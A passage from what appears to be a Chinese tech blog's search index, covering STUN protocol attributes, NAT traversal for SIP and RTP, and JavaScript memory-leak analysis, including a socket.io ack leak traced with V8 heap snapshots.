\u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change port\u0026rdquo; behaviour.\n0x0006: USERNAME - This attribute is optional and is present in a Shared Secret Response with the PASSWORD attribute. It serves as a means to identify the shared secret used in the message integrity check.\n0x0007: PASSWORD - This attribute is optional and only present in Shared Secret Response along with the USERNAME attribute. The value of the PASSWORD attribute is of variable length and used as a shared secret between the STUN server and the STUN client.\n0x0008: MESSAGE-INTEGRITY - This attribute must be the last attribute in a STUN message and can be present in both Binding Request and Binding Response. It contains HMAC-SHA1 of the STUN message.\n**0x0009: ERROR-CODE - **This attribute is present in the Binding Error Response and Shared Secret Error Response only. It indicates that an error has occurred and indicates also the type of error which has occurred. 
It contains a numerical value in the range of 100 to 699; which is the error code and also a textual reason phrase encoded in UTF-8 describing the error code, which is meant for the client.\n0x000a: UNKNOWN-ATTRIBUTES - This attribute is present in the Binding Error Response or Shared Secret Error response when the error code is 420; some attributes sent from the client in the Request are unknown and the server does not understand them.\n0x000b: REFLECTED-FROM - This attribute is present only in Binding Response and its use is to provide traceability so the STUN server cannot be used as part of a denial of service attack. It contains the IP address of the source from where the request came from, i.e. the IP address of the STUN client.\nCommon STUN Server error codes Like many other protocols, the STUN protocol has a list of error codes. STUN protocol error codes are similar to those of HTTP or SIP. Below is a list of most common error codes encountered when using the STUN protocol. For a complete list of STUN protocol error codes refer to the STUN RFC 3489.\nError Code 400 - Bad request; the request was malformed. Client must modify request and try sending it again. Error Code 420 - Unknown attribute; the server did not understand an attribute in the request. Error Code 430 - Stale credentials; the shared secret sent in the request is expired; the client should obtain a new shared secret. Error Code 432 - Missing username; the username attribute is not present in the request. Error Code 500 - Server error; temporary error and the client should try to send the request again. 
下图是一个webrtc呼叫的抓包,可以看到,在呼叫建立前的阶段。服务端和客户端都相互发送了Binding Request和响应了Bind Response。\n并且在通话过程中,还会有持续的binding reqeust, 并且在某些时候,源端口可能会变。说明媒体发送的端口也已经发生了改变。\n如果binding request 请求没有响应,那么语音很可以也会断,从而导致了呼叫挂断。\n参考 https://www.3cx.com/blog/voip-howto/stun/ https://www.3cx.com/blog/voip-howto/stun-voip-1/ https://www.3cx.com/blog/voip-howto/stun-protocol/ https://www.3cx.com/blog/voip-howto/stun-details/ ","permalink":"https://wdd.js.org/opensips/ch1/stun-notes/","summary":"title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port.","title":"STUN协议笔记"},{"content":"什么是NAT? 
NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的网址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类网址只能由于私有地址,这些地址只能由于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会从分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.168.1.160:11266\u0026gt; c=IN IP4 192.168.1.160 m=audio 8616 RTP/AVP 0 8 3 101 sip消息头Via, Contact以及sdp中的c=和m=, 可能会带有内网的ip和端口,如果不加以翻译处理,sip服务器是无法将消息发到这些内网地址上的。\nfs会将原始Contact头增加一些信息\nContact 1001@192.168.0.102:5060;fs_nat=yes;fs_path:sip:1001@1.2.3.4:23424 RTP流NAT穿越 c=IN IP4 192.168.40.79 m=audio 31114 RTP/AVP 0 8 9 101 一般invite消息或者200ok的sdp下都会携带连接信息, c=, 但是这个连接信息因为是内网地址,所以fs并不会使用这个作为rtp的对端地址。\nfs会等待NAT内部设备发来的第一个RTP包,fs会分析RTP包,提取出NAT设备上的RTP洞的信息,然后将另一方的语音流送到NAT设备上的洞里。\n再由NAT设备将RTP流送到对应的内部主机。\nNAT与SIP的问题 
NAT设备,例如路由器,一般工作在网络层和传输层。NAT会修改网络层的IP地址和传输层的端口,但是NAT不会修改包的内容。sip消息都是封装到包内容中的。\n看一个INVITE消息,出现的内容都是内网中的,当sip服务器收到这个消息,那么它是无法向内网发送响应体的。\nVia 头中的10.1.1.221:5060 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 当然,有问题就有解决方案\nreceived 标记来源ip rport 标记来源端口 使用这两个字段,就可以将数据正确的发送到NAT设备上\nINVITE sip:UserB@there.com SIP/2.0 Via: SIP/2.0/UDP 10.1.1.221:5060;branch=z9hG4bKhjh From: TheBigGuy \u0026lt;sip:UserA@customer.com\u0026gt;;tag=343kdw2 To: TheLittleGuy \u0026lt;sip:UserB@there.com\u0026gt; Max-Forwards: 70 Call-ID: 123456349fijoewr CSeq: 1 INVITE Subject: Wow! It Works... Contact: \u0026lt;sip:UserA@10.1.1.221\u0026gt; Content-Type: application/sdp Content-Length: ... v=0 o=UserA 2890844526 2890844526 IN IP4 UserA.customer.coms=- t=0 0 c=IN IP4 10.1.1.221 m=audio 49170 RTP/AVP 0 a=rtpmap:0 PCMU/8000 参考 https://tools.ietf.org/html/rfc1918 ","permalink":"https://wdd.js.org/opensips/ch1/nat-sip-rtp/","summary":"什么是NAT? NAT(网络地址转换), 具体可以参考百科 https://baike.baidu.com/item/nat/320024。\nNAT是用来解决IPv4的地址不够的问题。\n例如上图,内网的主机,在访问外网时,源192.168的网址,会被改写成1.2.3.4。所以在server端看来,请求是从1.2.3.4发送过来的。\nNAT一般会改写请求的源IP包的源IP地址,也可能会改写tcp或者udp的源端口地址。\nNAT地址范围 互联网地址分配机构保留了三类网址只能由于私有地址,这些地址只能由于NAT内部,不能用于公网。\n如果在sip消息中,Contact头中的地址是192.168开头,聪明的服务器应该知道,这个请求来自NAT内部。\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) NAT 工作原理 NAT内部流量流出时,源IP和源端口都被改写,目标地址和端口不会改写。源ip和端口与被改写后的ip和端口存在一段时间的映射关系,当响应回来时,根据这个映射关系,NAT设备知道这个包应该发给内网的哪个设备。\nNAT分类 静态NAT: 每个内部主机都永久映射一个外部公网IP 动态NAT: 每个内部主机都动态映射一个外部公网IP 网络地址端口转换: 内部主机映射到外部不同端口上 由于静态NAT和动态NAT并不能节省公网IP, 常用的都是网络地址端口转换,即NAPT。\nNAPT 网络地址端口转换分类 全锥型NAT 限制锥型NAT: 限制主机 端口限制NAT:限制主机和端口 Full Cone NAT 全锥型NAT 打洞过程\n来自nat内部ip1:port1地址在经过路由器时,路由器会打洞ip1\u0026rsquo;:port1' 任何服务器只要把包发到ip1\u0026rsquo;:port1\u0026rsquo;,路由器都会把这个包发到ip1:port1。也就是说,即使刚开始打洞的包是发给server1的,如果server2知道这个洞的信息,那么server2也可以通过这洞,将消息发给ip1:port1 Restricted Cone NAT 限制锥型NAT 
限制锥型打洞过程和全锥型差不多,只不过增加了限制。\n如果内部主机是把包发到server1的,即使server2知道打洞的信息,它发的包也不会被转给内部主机。 Port Restricted Cone NAT 端口限制NAT 端口限制NAT要比上述两种NAT的限制更为严格\n内部主机如果将消息发到server1的5080端口,那么这个端口只允许server1的5080端口发消息回来 server1的其他端口发消息到这个洞都会被拒绝 SIP信令NAT穿越 NAT内部消息发到fs时,会携带如下信息。假如fs对NAT一无所知,如果后续有呼叫,fs是无法将消息发到192.168.0.102的,因为192.168.0.102是内网地址。\n但是fs足够聪明,它会分析包的源ip和源端口,从而正确的将sip消息送到NAT设备上。\nVia: SIP/2.0/UDP 192.168.1.160:11266;branch=z9hG4bK-d8754z-1f2cd509;rport Contact: \u0026lt;sip:flavio@192.","title":"SIP信令和媒体都绕不开的NAT问题"},{"content":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支配节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,应用可能会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这会让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects. Using this hidden classes, V8 works much faster. If you \u0026ldquo;delete\u0026rdquo; properties, these assumptions are no longer valid, and the code is de-optimized, slowing your code. 
// Fast Object function FastPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var fast = new FastPurchase(3, 25); // Slow Object function SlowPurchase(units, price) { this.units = units; this.price = price; this.total = 0; this.x = 1; } var slow = new SlowPurchase(3, 25); //x property is useless //so I delete it delete slow.x; Timers内存泄露 // var buggyObject = { callAgain: function () { var ref = this; var val = setTimeout(function () { console.log(\u0026#39;Called again: \u0026#39; + new Date().toTimeString()); ref.callAgain(); }, 1000); } }; buggyObject.callAgain(); buggyObject = null; 闭包内存泄露 var a = function () { var largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function () { return largeStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { return smallStr; }; }(); var a = function () { var smallStr = \u0026#39;x\u0026#39;, largeStr = new Array(1000000).join(\u0026#39;x\u0026#39;); return function (n) { eval(\u0026#39;\u0026#39;); //maintains reference to largeStr return smallStr; }; }(); DOM 内存泄露 #leaf maintains a reference to it\u0026rsquo;s parent (parentNode), and recursively up to #tree, so only when leafRef is nullified is the WHOLE tree under #tree candidate to be GC\nvar select = document.querySelector; var treeRef = select(\u0026#34;#tree\u0026#34;); var leafRef = select(\u0026#34;#leaf\u0026#34;); var body = select(\u0026#34;body\u0026#34;); body.removeChild(treeRef); //#tree can\u0026#39;t be GC yet due to treeRef treeRef = null; //#tree can\u0026#39;t be GC yet, due to //indirect reference from leafRef leafRef = null; //NOW can be #tree GC 守则 Use appropiate scope Better than de-referencing, use local scopes. Unbind event listeners Unbind events that are no longer needed, specially if the related DOM objects are going to be removed. 
Manage local cache Be careful with storing large chunks of data that you are not going to use. 分析内存泄漏的工具 浏览器: performance.memory devtool memory profile 关于闭包的提示 给闭包命名,这样在内存分析时,就可以按照函数名找到对应的函数 ","permalink":"https://wdd.js.org/fe/memory-leak-ppt/","summary":"参考: http://slides.com/gruizdevilla/memory\n内存是一张图 原始类型,只能作为叶子。原始类型不能引用其他类型 数字 字符串 布尔值 除了原始类型之外,其他类型都是对象,其实就是键值对 数组是一种特殊对象,它的键是连续的数字 内存从根开始 在浏览器中,根对象是window 在nodejs中,根对象是global 任何从根无法到达的对象,都会被GC回收,例如下图的节点9和10 根节点的GC是无法控制的 路径 从根节点开始到特定对象的路径,如下图的1-2-4-6-8 支配项 每个对象有且仅有一个支配项,支配项对对象可能不是直接引用 举例子 节点1支配节点2 节点2支配节点3、4、6 节点3支配节点5 节点6支配节点7 节点5支配节点8 上面的例子有个不好理解的是节点2为什么支配了节点6?如果节点A存在于从根节点到节点B的每一个路径中,那么A就是B的支配项。2存在于1-2-4-6,也存在于1-2-3-6,所以节点2支配节点6 V8 新生代与老生代 v8内存分为新生代和老生代内存,两块内存使用不同的内存GC策略 相比而言,新生代GC很快,老生代则较慢 新生代的内存在某些条件下会被转到老生代内存区 GC发生时,应用可能会暂停 解除引用的一些错误 var a = {name: \u0026#39;wdd\u0026#39;} delete a.name // 这会让对象a变成慢对象 var a = {name: \u0026#39;wdd\u0026#39;} a.name = null // 这个则更好 关于slow Object V8 optimizing compiler makes assumptions on your code to make optimizations. It transparently creates hidden classes that represent your objects.","title":"JavaScript内存泄露分析"},{"content":"什么是内存泄漏? 单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否会下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否则你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 
为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线会被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解他们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 从根节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从根对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到根节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在于从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必须释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shallow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.get(\u0026#39;/heapdump\u0026#39;, function (req: express.Request, res: express. 
Response, next: express.NextFunction) { logger.debug(\u0026#39;help_heapdump::\u0026#39;, req.ip, req.hostname) if (req.hostname !== \u0026#39;localhost\u0026#39;) { logger.error(\u0026#39;error:report_bad_host:\u0026#39;, req.hostname) return res.status(401).end() } res.status(200).end() let fileName = writeHeapSnapshot(\u0026#39;node.heapsnapshot\u0026#39;) logger.info(\u0026#39;help_heapdumap_file::\u0026#39;, fileName) }) 通过将v8 writeHeapSnapshot放到express的路由中,我们可以简单通过curl的方式产生snapshot文件。需要注意的是,writeHeapSnapshot可能需要一段时间来产生snapshot文件。在生产环境要注意,需要注意产生该函数的调用频率。\n拿到snapshot文件后,下一步是使用chrome dev-tools去打开这个文件。\n在chrome的inspect页面:chrome://inspect/#devices\n点击Open dedicated DevTools for Node。可以打开一个单独的页面dev-tools页面。当然你也可以任意一个页面打开devTools.\n点击load, 选择snapshot文件,就可以加载了。 真实的内存泄漏实战分析: socket.io内存泄漏 我写过一个使用socket.io来完成实时消息推送的服务,在做压力测试的时候,两个实例,模拟2000个客户端WebSocket连接,然后以每秒1000个速度发送消息,在持续压测15个小时之后,Node.js的内存从50M上涨到1.5G。所以,这其中必然产生了内存泄漏。\n在array这一列,可以看出它占用的Shallow Size和Retained Size占用的内存都是超过90%的。 我们展开array这一列,可以发现有很多的distance是15的对象。然后我们展开其中一个对象后。\n可以发现从距离是14到1之间的保留路径。\n展开一个对象之后,发现有很多ackClient,这个ackClient实际上对应了代码里我写的一个函数,用来确认消息是否被客户端收到的。这个确认机制是socket.io提供的。\n当我确认内存泄漏是socket.io的确认机制的问题后,我就将确认的函数从代码中移除,改为消息不确认。在一段时间的压测过后,服务的内存趋于稳定,看来问题已经定位了。\nsocket.io内存泄漏的原因 在阅读了socket.io的源码之后,可以看到每个Socket对象都有一个acks对象用来表示确认。\nfunction Socket(nsp, client, query){ this.nsp = nsp; this.server = nsp.server; this.adapter = this.nsp.adapter; this.id = nsp.name !== \u0026#39;/\u0026#39; ? 
nsp.name + \u0026#39;#\u0026#39; + client.id : client.id; this.client = client; this.conn = client.conn; this.rooms = {}; this.acks = {}; this.connected = true; this.disconnected = false; this.handshake = this.buildHandshake(query); this.fns = []; this.flags = {}; this._rooms = []; } 在调用socket.emit()方法时,socket.io会将消息的id附着在acks对象上,可以想象,随着消息发送的量增大,这个acks的属性将会越来越多。\nif (typeof args[args.length - 1] === \u0026#39;function\u0026#39;) { if (this._rooms.length || this.flags.broadcast) { throw new Error(\u0026#39;Callbacks are not supported when broadcasting\u0026#39;); } debug(\u0026#39;emitting packet with ack id %d\u0026#39;, this.nsp.ids); this.acks[this.nsp.ids] = args.pop(); packet.id = this.nsp.ids++; } 当收到ack之后,acks上对应的包的属性才会被删掉。\nSocket.prototype.onack = function(packet){ var ack = this.acks[packet.id]; if (\u0026#39;function\u0026#39; == typeof ack) { debug(\u0026#39;calling ack %s with %j\u0026#39;, packet.id, packet.data); ack.apply(this, packet.data); delete this.acks[packet.id]; } else { debug(\u0026#39;bad ack %s\u0026#39;, packet.id); } }; 如果客户端不对消息进行ack确认,那么服务端就会积累非常多的待确认的消息,最终导致内存泄漏。\n虽然这个问题的最终原因是客户端没有及时确认,但是查看一下socket.io的项目,发现已经有将近500个issue没有解决。我觉得有时间的话,我会用原生的websocket替换掉socket.io。不然这个socket.io很可能回成为项目的一个瓶颈点。\n参考资料 http://slides.com/gruizdevilla/memory http://bmeck.github.io/snapshot-utils/doc/manual/terms.html https://nodejs.org/dist/latest-v12.x/docs/api/v8.html#v8_v8_writeheapsnapshot_filename https://github.com/socketio/socket.io/issues/3494 ","permalink":"https://wdd.js.org/fe/memory-leak-sharing/","summary":"什么是内存泄漏? 
单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否回下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否者你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线回被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解他们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 
从根节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从根对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到根节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在于从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必须释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shallow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.","title":"JS内存泄漏分享"},{"content":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst fs = require(\u0026#39;fs\u0026#39;) const readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { 
